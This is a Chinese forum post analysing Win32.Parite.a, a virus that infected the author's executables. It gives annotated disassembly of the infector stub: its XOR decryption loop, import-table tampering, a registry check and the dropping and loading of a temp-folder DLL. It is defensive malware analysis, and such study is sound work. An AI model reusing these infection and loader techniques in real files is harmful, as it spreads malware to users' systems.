郁闷啊!电脑中毒了,多年收集的工具及自己写的一些小程序都被感染了。在网上查了一下,是WIN32.parite.a。
于是就对被它感染的exe文件进行了分析,贴出来与大家交流一下,有错的地方希望大家指出。
病毒分析
啥都不说了,直接看代码吧。
00406000 > B9 1857D200 mov ecx, 0D25718
00406005 68 16604000 push 00406016 ;由于没有重定位,如果没有按默任基址载入运行,程序将崩溃
0040600A 5F pop edi
0040600B BA C4060000 mov edx, 6C4
00406010 310C3A xor dword ptr [edx+edi], ecx
00406013 4A dec edx
00406014 83EA 03 sub edx, 3
00406017 ^ 75 F7 jnz short 00406010
00406019 90 nop
0040601A F0:2AD3 lock sub dl, bl ; 不允许锁定前缀
0040601D 0018 add byte ptr [eax], bl
0040601F 57 push edi
病毒在感染文件时,在exe文件中增加一个节(节名随机生成),并将原程序入口点,基址保存,改写入口点指向病毒代码。
病毒在写入文件时,与随机产生的一个数异或加密,以上代码即为解密。解码后的代码:
00406000 > B9 1857D200 mov ecx, 0D25718
00406005 68 16604000 push 00406016
0040600A 5F pop edi
0040600B BA C4060000 mov edx, 6C4
00406010 310C3A xor dword ptr [edx+edi], ecx
00406013 4A dec edx
00406014 83EA 03 sub edx, 3
00406017 ^ 75 F7 jnz short 00406010
00406019 90 nop
0040601A E8 7D010000 call 0040619C ;这个call即为病毒代码
0040601F 0000 add byte ptr [eax], al
00406021 0000 add byte ptr [eax], al
00406023 0040 00 add byte ptr [eax], al
00406026 0010 add byte ptr [eax], dl
00406028 0000 add byte ptr [eax], al
0040602A 0028 add byte ptr [eax], ch
0040602C 0000 add byte ptr [eax], al
进入call 0040619C:
0040619C 55 push ebp
0040619D 8BEC mov ebp, esp
0040619F 81C4 B4FEFFFF add esp, -14C
004061A5 C645 F7 00 mov byte ptr [ebp-9], 0 ; 标志位
004061A9 8BC5 mov eax, ebp
004061AB 83C0 04 add eax, 4
004061AE 8B10 mov edx, dword ptr [eax]
004061B0 83EA 05 sub edx, 5
004061B3 8955 FC mov dword ptr [ebp-4], edx ; edx为解密后病毒代码执行的起始地址
004061B6 8B4D FC mov ecx, dword ptr [ebp-4]
004061B9 81C1 84000000 add ecx, 84
004061BF 894D F8 mov dword ptr [ebp-8], ecx
004061C2 8B45 FC mov eax, dword ptr [ebp-4]
004061C5 8B50 0C mov edx, dword ptr [eax+C] ; 读取原程序的入口点放入edx
004061C8 8B4D FC mov ecx, dword ptr [ebp-4]
004061CB 0351 08 add edx, dword ptr [ecx+8] ; 基址+入口点得到原程序代码起始地址
004061CE 8BC5 mov eax, ebp
004061D0 83C0 04 add eax, 4
004061D3 8910 mov dword ptr [eax], edx ;写入[ebp+4],等病毒代码执行完后直接ret到原程序执行
004061D5 FF75 F8 push dword ptr [ebp-8]
004061D8 FF75 FC push dword ptr [ebp-4]
004061DB 8D55 BC lea edx, dword ptr [ebp-44]
004061DE 52 push edx
004061DF E8 78000000 call 0040625C ; 取得要用到的函数的地址
004061E4 84C0 test al, al
004061E6 74 6D je short 00406255
004061E8 FF75 F8 push dword ptr [ebp-8]
004061EB 8D4D BC lea ecx, dword ptr [ebp-44]
004061EE 51 push ecx
004061EF 8D85 B4FEFFFF lea eax, dword ptr [ebp-14C]
004061F5 50 push eax
004061F6 E8 05020000 call 00406400
004061FB 84C0 test al, al ; 比较al,为零跳到406222处执行,重新释放病毒体
004061FD 74 23 je short 00406222
004061FF 66:83BD B4FEFFF>cmp word ptr [ebp-14C], 6 ; 读取注册表项的第一个数据与6比较
00406207 72 19 jb short 00406222 ;小于就到406222重新释放病毒体
00406209 FF75 F8 push dword ptr [ebp-8]
0040620C FF75 FC push dword ptr [ebp-4]
0040620F 8D55 BC lea edx, dword ptr [ebp-44]
00406212 52 push edx
00406213 8D8D B6FEFFFF lea ecx, dword ptr [ebp-14A]
00406219 51 push ecx ; 读取注册表项PINF得到病毒dll地址
0040621A E8 51020000 call 00406470
0040621F 8845 F7 mov byte ptr [ebp-9], al ; 将返回值赋值给标志位
00406222 807D F7 00 cmp byte ptr [ebp-9], 0 ; 相等退去,否则向下执行
00406226 75 2D jnz short 00406255
00406228 FF75 FC push dword ptr [ebp-4]
0040622B 8D45 BC lea eax, dword ptr [ebp-44]
0040622E 50 push eax
0040622F 8D95 B6FEFFFF lea edx, dword ptr [ebp-14A]
00406235 52 push edx
00406236 E8 81020000 call 004064BC ;释放病毒体
0040623B 84C0 test al, al
0040623D 74 16 je short 00406255
0040623F FF75 F8 push dword ptr [ebp-8]
00406242 FF75 FC push dword ptr [ebp-4]
00406245 8D4D BC lea ecx, dword ptr [ebp-44]
00406248 51 push ecx
00406249 8D85 B6FEFFFF lea eax, dword ptr [ebp-14A]
0040624F 50 push eax
00406250 E8 1B020000 call 00406470 ; 加载新创建的dll文件并运行
00406255 8BE5 mov esp, ebp
00406257 5D pop ebp
00406258 C3 retn
以上就是进入call后的代码,我都加了注释,下面我们详细分析其中每个call的作用。
004061DF E8 78000000 call 0040625C
它主要得到病毒要使用的函数地址,我讲解一下它的方法
代码;
0040625C 55 push ebp
0040625D 8BEC mov ebp, esp
0040625F 51 push ecx
00406260 8B45 0C mov eax, dword ptr [ebp+C]
00406263 8B50 20 mov edx, dword ptr [eax+20] ; 读取输入表得到LoadLibraryA的地址
00406266 8B0A mov ecx, dword ptr [edx]
00406268 8B45 08 mov eax, dword ptr [ebp+8]
0040626B 8908 mov dword ptr [eax], ecx
0040626D 8B55 0C mov edx, dword ptr [ebp+C]
00406270 8B4A 20 mov ecx, dword ptr [edx+20]
00406273 83C1 04 add ecx, 4
00406276 8B01 mov eax, dword ptr [ecx] ; 读取输入表得到GetProcAddress的地址
到这里读者就应该好好了解一下pe文件的输入表了,这方面的资料论坛里有很多,我就不赘述了。
病毒首先找到kernel32.dll的IID,修改前两个函数的INT,使其指向自己节中LoadLiibraryA,GetProcAddress。当被感染的程序运行,PE装载器首先搜索OriginalFirstThunk,并找到每个IMAGE_IMPORT_BY_NAME结构所指向的函数地址并写入对应的IAT,所以程序运行后,前两个IAT就是LoadLiibraryA,GetProcAddres的地址。
病毒程序保存被修改的函数的名字,在得到LoadLiibraryA,GetProcAddres的地址后动态加载它们的地址,并写回到原IAT
00406278 8B55 08 mov edx, dword ptr [ebp+8]
0040627B 8942 04 mov dword ptr [edx+4], eax
0040627E FF75 10 push dword ptr [ebp+10]
00406281 8B4D 08 mov ecx, dword ptr [ebp+8]
00406284 FF11 call dword ptr [ecx] ; 调用LoadLibraryA加载kernel32.dll
00406286 8945 FC mov dword ptr [ebp-4], eax
00406289 837D FC 00 cmp dword ptr [ebp-4], 0
0040628D 0F84 F9000000 je 0040638C
00406293 8B45 0C mov eax, dword ptr [ebp+C]
00406296 FF70 24 push dword ptr [eax+24]
00406299 FF75 FC push dword ptr [ebp-4]
0040629C 8B55 08 mov edx, dword ptr [ebp+8]
0040629F FF52 04 call dword ptr [edx+4] ; 调用GetProcAddress
004062A2 8B4D 0C mov ecx, dword ptr [ebp+C]
004062A5 8B51 20 mov edx, dword ptr [ecx+20]
004062A8 8902 mov dword ptr [edx], eax ; 取得GetCommandLineA的地址并写回原输入表
004062AA 8B45 0C mov eax, dword ptr [ebp+C]
004062AD FF70 28 push dword ptr [eax+28]
004062B0 FF75 FC push dword ptr [ebp-4]
004062B3 8B4D 08 mov ecx, dword ptr [ebp+8]
004062B6 FF51 04 call dword ptr [ecx+4]
004062B9 8B55 0C mov edx, dword ptr [ebp+C]
004062BC 8B4A 20 mov ecx, dword ptr [edx+20]
004062BF 83C1 04 add ecx, 4
004062C2 8901 mov dword ptr [ecx], eax ; 得到lstrcpyA的地址并写回原输入表
004062C4 8B45 10 mov eax, dword ptr [ebp+10]
004062C7 83C0 0D add eax, 0D ; 下面的代码取得病毒代码要用到函数的地址
004062CA 50 push eax
004062CB FF75 FC push dword ptr [ebp-4]
004062CE 8B45 08 mov eax, dword ptr [ebp+8]
004062D1 FF50 04 call dword ptr [eax+4]
004062D4 8B55 08 mov edx, dword ptr [ebp+8]
004062D7 8942 08 mov dword ptr [edx+8], eax ; kernel32.GetTempPathA
…
下面就是这个CALL
004061F6 E8 05020000 call 00406400
进入:
00406400 55 push ebp
00406401 8BEC mov ebp, esp
00406403 83C4 F4 add esp, -0C
00406406 C645 FB 00 mov byte ptr [ebp-5], 0 ; 标志位
0040640A C745 F4 0601000>mov dword ptr [ebp-C], 106
00406411 8D45 FC lea eax, dword ptr [ebp-4]
00406414 50 push eax ; pHandle = 0012FE20
00406415 68 19000200 push 20019 ; Access = KEY_READ
0040641A 6A 00 push 0 ; Reserved = 0
0040641C 8B55 10 mov edx, dword ptr [ebp+10]
0040641F 81C2 BD000000 add edx, 0BD
00406425 52 push edx ; Subkey = "Software\Microsoft\Windows\CurrentVersion\Explorer"
00406426 68 01000080 push 80000001 ; hKey=HKEY_CURRENT_USER
0040642B 8B4D 0C mov ecx, dword ptr [ebp+C]
0040642E FF51 2C call dword ptr [ecx+2C] ; CALL 到ADVAPI32.RegOpenKeyExA
00406431 85C0 test eax, eax
00406433 75 32 jnz short 00406467 ; 不为零就跳,al=0
00406435 8D45 F4 lea eax, dword ptr [ebp-C]
00406438 50 push eax ; pBufSize = 0012FE18
00406439 FF75 08 push dword ptr [ebp+8] ; Buffer = 0012FE38
0040643C 6A 00 push 0 ; pValueType = NULL
0040643E 6A 00 push 0 ; Reserved = NULL
00406440 8B55 10 mov edx, dword ptr [ebp+10]
00406443 81C2 F0000000 add edx, 0F0
00406449 52 push edx ; ValueName = "PINF"
0040644A FF75 FC push dword ptr [ebp-4] ; hKey = A8
0040644D 8B4D 0C mov ecx, dword ptr [ebp+C]
00406450 FF51 30 call dword ptr [ecx+30] ; CALL 到 RegQueryValueExA
00406453 85C0 test eax, eax ; 存在项PINF,eax=0
00406455 0F94C0 sete al ; 则al=1
00406458 83E0 01 and eax, 1
0040645B 8845 FB mov byte ptr [ebp-5], al
0040645E FF75 FC push dword ptr [ebp-4] ; hKey = 000000A8
00406461 8B55 0C mov edx, dword ptr [ebp+C]
00406464 FF52 34 call dword ptr [edx+34] ; ADVAPI32.RegCloseKey
00406467 8A45 FB mov al, byte ptr [ebp-5]
0040646A 8BE5 mov esp, ebp
0040646C 5D pop ebp ; 0012FF84
0040646D C2 0C00 retn 0C
上面我都做了注释,主要时读取注册表,存在则致al为1,保存读取的数据,否则al为零。
再分析这个CALL
0040621A E8 51020000 call 00406470
代码:
00406470 55 push ebp
00406471 8BEC mov ebp, esp
00406473 83C4 F8 add esp, -8
00406476 FF75 08 push dword ptr [ebp+8] ; ASCII "C:\Users\Lenovo\AppData\Local\Temp\vydF2D7.tmp"
00406479 8B45 0C mov eax, dword ptr [ebp+C]
0040647C FF10 call dword ptr [eax] ;调用LoadLiibraryA
0040647E 8945 FC mov dword ptr [ebp-4], eax
00406481 837D FC 00 cmp dword ptr [ebp-4], 0
00406485 74 2A je short 004064B1
00406487 8B55 14 mov edx, dword ptr [ebp+14]
0040648A 81C2 F5000000 add edx, 0F5
00406490 52 push edx ; 取得函数Initiate的地址
00406491 FF75 FC push dword ptr [ebp-4]
00406494 8B4D 0C mov ecx, dword ptr [ebp+C]
00406497 FF51 04 call dword ptr [ecx+4] ;调用GetProcAddress
0040649A 8945 F8 mov dword ptr [ebp-8], eax ; vydF2D7.Initiate
0040649D 837D F8 00 cmp dword ptr [ebp-8], 0
004064A1 74 0E je short 004064B1
004064A3 FF75 10 push dword ptr [ebp+10]
004064A6 FF55 F8 call dword ptr [ebp-8] ; call到vydF2D7.Initiate即真正的病毒体运行
004064A9 84C0 test al, al
004064AB 74 04 je short 004064B1
004064AD B0 01 mov al, 1
004064AF EB 02 jmp short 004064B3
004064B1 33C0 xor eax, eax
004064B3 59 pop ecx
004064B4 59 pop ecx
004064B5 5D pop ebp
004064B6 C2 1000 retn 10
上面取得注册表数据,得到真正运行的病毒的地址并动态加载运行。
最后一个CALL
00406236 E8 81020000 call 004064BC
代码:
004064BC 55 push ebp
004064BD 8BEC mov ebp, esp
004064BF 50 push eax
004064C0 B8 02000000 mov eax, 2
004064C5 81C4 04F0FFFF add esp, -0FFC ; 分配堆栈
004064CB 50 push eax
004064CC 48 dec eax
004064CD ^ 75 F6 jnz short 004064C5
004064CF 8B45 FC mov eax, dword ptr [ebp-4]
004064D2 81C4 E4F6FFFF add esp, -91C
004064D8 68 04010000 push 104 ; BufSize = 104 (260.)
004064DD 8D85 E0FEFFFF lea eax, dword ptr [ebp-120]
004064E3 50 push eax ; PathBuffer = 0012FD04
004064E4 6A 00 push 0 ; hModule = NULL
004064E6 8B55 0C mov edx, dword ptr [ebp+C]
004064E9 FF52 28 call dword ptr [edx+28] ; CALL 到 GetModuleFileNameA
004064EC 6A 00 push 0 ; hTemplateFile = NULL
004064EE 6A 01 push 1 ; Attributes = READONLY
004064F0 6A 03 push 3 ; Mode = OPEN_EXISTING
004064F2 6A 00 push 0 ; pSecurity = NULL
004064F4 6A 01 push 1 ; ShareMode = FILE_SHARE_READ
004064F6 68 00000080 push 80000000 ; Access = GENERIC_READ
004064FB 8D8D E0FEFFFF lea ecx, dword ptr [ebp-120]
00406501 51 push ecx ; FileName = "F:\masm Object\EnumWindows\EnumWindows.exe"
即读取自身
00406502 8B45 0C mov eax, dword ptr [ebp+C]
00406505 FF50 10 call dword ptr [eax+10] ; CALL 到 CreateFileA
00406508 8945 F4 mov dword ptr [ebp-C], eax
0040650B 837D F4 FF cmp dword ptr [ebp-C], -1
0040650F 0F84 72010000 je 00406687
00406515 8D95 E0FEFFFF lea edx, dword ptr [ebp-120]
0040651B 52 push edx ; 取得临时文件夹路径
0040651C 68 04010000 push 104
00406521 8B4D 0C mov ecx, dword ptr [ebp+C]
00406524 FF51 08 call dword ptr [ecx+8] ; call 到GetTempPath
00406527 8B45 0C mov eax, dword ptr [ebp+C]
0040652A FF50 24 call dword ptr [eax+24]
0040652D 8945 F8 mov dword ptr [ebp-8], eax ; /
00406530 33D2 xor edx, edx ; 在临时文件夹中产生一个文件,文件名前三个字母随机生成
00406532 8955 EC mov dword ptr [ebp-14], edx
00406535 8B4D EC mov ecx, dword ptr [ebp-14]
00406538 33C0 xor eax, eax
0040653A 8A440D F8 mov al, byte ptr [ebp+ecx-8]
0040653E B9 0A000000 mov ecx, 0A
00406543 99 cdq
00406544 F7F9 idiv ecx
00406546 04 61 add al, 61
00406548 8B55 EC mov edx, dword ptr [ebp-14]
0040654B 884415 F8 mov byte ptr [ebp+edx-8], al
0040654F FF45 EC inc dword ptr [ebp-14]
00406552 837D EC 02 cmp dword ptr [ebp-14], 2
00406556 ^ 7E DD jle short 00406535 ; \
00406558 C645 FB 00 mov byte ptr [ebp-5], 0
0040655C FF75 08 push dword ptr [ebp+8] ; TempName
0040655F 6A 00 push 0 ; Unique = 0
00406561 8D45 F8 lea eax, dword ptr [ebp-8]
00406564 50 push eax ; Prefix = "bqb"
00406565 8D8D E0FEFFFF lea ecx, dword ptr [ebp-120]
0040656B 51 push ecx ; Path = "C:\Users\Lenovo\AppData\Local\Temp\"
0040656C 8B45 0C mov eax, dword ptr [ebp+C]
0040656F FF50 0C call dword ptr [eax+C] ; CALL 到 GetTempFileNameA
00406572 6A 00 push 0 ; hTemplateFile = NULL
00406574 68 80000000 push 80 ; Attributes = NORMAL
00406579 6A 02 push 2 ; Mode = CREATE_ALWAYS
0040657B 6A 00 push 0 ; pSecurity = NULL
0040657D 6A 01 push 1 ; ShareMode = FILE_SHARE_READ
0040657F 68 000000C0 push C0000000 ; Access = GENERIC_READ|GENERIC_WRITE
00406584 FF75 08 push dword ptr [ebp+8] ; FileName = "C:\Users\Lenovo\AppData\Local\Temp\bqbCF35.tmp"
00406587 8B55 0C mov edx, dword ptr [ebp+C]
0040658A FF52 10 call dword ptr [edx+10] ; CALL 到 CreateFileA
0040658D 8945 F0 mov dword ptr [ebp-10], eax
00406590 837D F0 FF cmp dword ptr [ebp-10], -1
00406594 0F84 DE000000 je 00406678
0040659A 8B4D 10 mov ecx, dword ptr [ebp+10]
0040659D 8B41 18 mov eax, dword ptr [ecx+18]
004065A0 8945 E8 mov dword ptr [ebp-18], eax ; eax为创建文件大小
004065A3 6A 00 push 0 ; Origin = FILE_BEGIN
004065A5 6A 00 push 0 ; pOffsetHi = NULL
004065A7 8B55 10 mov edx, dword ptr [ebp+10]
004065AA FF72 14 push dword ptr [edx+14] ; OffsetLo = 2EFC (12028.)
004065AD FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
004065B0 8B4D 0C mov ecx, dword ptr [ebp+C]
004065B3 FF51 1C call dword ptr [ecx+1C] ; CALL 到 SetFilePointer
004065B6 817D E8 0028000>cmp dword ptr [ebp-18], 2800
004065BD 76 60 jbe short 0040661F
004065BF 6A 00 push 0 ; pOverlapped = NULL
004065C1 8D45 E4 lea eax, dword ptr [ebp-1C]
004065C4 50 push eax ; pBytesRead = 0012FE08
004065C5 68 00280000 push 2800 ; BytesToRead = 2800 (10240.)
004065CA 8D95 E0D6FFFF lea edx, dword ptr [ebp-2920]
004065D0 52 push edx ; Buffer = 0012D504
004065D1 FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
004065D4 8B4D 0C mov ecx, dword ptr [ebp+C]
004065D7 FF51 14 call dword ptr [ecx+14] ; CALL 到 ReadFile
004065DA 68 00280000 push 2800
004065DF 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
004065E5 50 push eax
004065E6 8B55 10 mov edx, dword ptr [ebp+10]
004065E9 FFB2 80000000 push dword ptr [edx+80]
004065EF E8 A0000000 call 00406694 ; 对读取的数据进行异或解密
004065F4 6A 00 push 0 ; pOverlapped = NULL
004065F6 8D4D E4 lea ecx, dword ptr [ebp-1C]
004065F9 51 push ecx ; pBytesWritten = 0012FE08
004065FA 68 00280000 push 2800 ; nBytesToWrite = 2800 (10240.)
004065FF 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
00406605 50 push eax ; Buffer = 0012D504
00406606 FF75 F0 push dword ptr [ebp-10] ; hFile = 000000AC (window)
00406609 8B55 0C mov edx, dword ptr [ebp+C]
0040660C FF52 18 call dword ptr [edx+18] ; CALL 到 WriteFile 将解密后的文件写入新创建的文件中
0040660F 816D E8 0028000>sub dword ptr [ebp-18], 2800
00406616 817D E8 0028000>cmp dword ptr [ebp-18], 2800
0040661D ^ 77 A0 ja short 004065BF ; 循环读取并写入
0040661F 6A 00 push 0 ; pOverlapped = NULL
00406621 8D4D E4 lea ecx, dword ptr [ebp-1C]
00406624 51 push ecx ; pBytesRead = 0012FE08
00406625 FF75 E8 push dword ptr [ebp-18] ; BytesToRead = 800 (2048.)
00406628 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
0040662E 50 push eax ; Buffer = 0012D504
0040662F FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
00406632 8B55 0C mov edx, dword ptr [ebp+C]
00406635 FF52 14 call dword ptr [edx+14] ; CALL 到 ReadFile
00406638 FF75 E8 push dword ptr [ebp-18]
0040663B 8D8D E0D6FFFF lea ecx, dword ptr [ebp-2920]
00406641 51 push ecx
00406642 8B45 10 mov eax, dword ptr [ebp+10]
00406645 FFB0 80000000 push dword ptr [eax+80]
0040664B E8 44000000 call 00406694 ; 解密最后读取的2kb数据
00406650 6A 00 push 0 ; 写入临时文件
00406652 8D55 E4 lea edx, dword ptr [ebp-1C]
00406655 52 push edx
00406656 FF75 E8 push dword ptr [ebp-18]
00406659 8D8D E0D6FFFF lea ecx, dword ptr [ebp-2920]
0040665F 51 push ecx
00406660 FF75 F0 push dword ptr [ebp-10]
00406663 8B45 0C mov eax, dword ptr [ebp+C]
00406666 FF50 18 call dword ptr [eax+18] ; CALL 到 WriteFile
00406669 FF75 F0 push dword ptr [ebp-10]
0040666C 8B55 0C mov edx, dword ptr [ebp+C]
0040666F FF52 20 call dword ptr [edx+20] ;调用CloseHandle,关闭文件句柄
00406672 C645 FF 01 mov byte ptr [ebp-1], 1
00406676 EB 04 jmp short 0040667C
00406678 C645 FF 00 mov byte ptr [ebp-1], 0
0040667C FF75 F4 push dword ptr [ebp-C]
0040667F 8B4D 0C mov ecx, dword ptr [ebp+C]
00406682 FF51 20 call dword ptr [ecx+20] ;调用CloseHandle,关闭文件句柄
00406685 EB 04 jmp short 0040668B
00406687 C645 FF 00 mov byte ptr [ebp-1], 0
0040668B 8A45 FF mov al, byte ptr [ebp-1]
0040668E 8BE5 mov esp, ebp
00406690 5D pop ebp
00406691 C2 0C00 retn 0C
上面的代码,在注册表不存在PINF项时或别的原因,中毒的PE文件将释放病毒文件,病毒代码在PE文件中,所以中毒的PE文件将增加174kb。
到此,就分析完了。本来想写个EXE修复工具的,不过我对dll的分析不在行,断点断不下来,只能希望论坛里的高手帮忙了。
- 标 题:WIN32.parite.a感染的PE文件分析
- 作 者:末日
- 时 间:2009-09-20 18:06
- 链 接:http://bbs.pediy.com/showthread.php?t=98167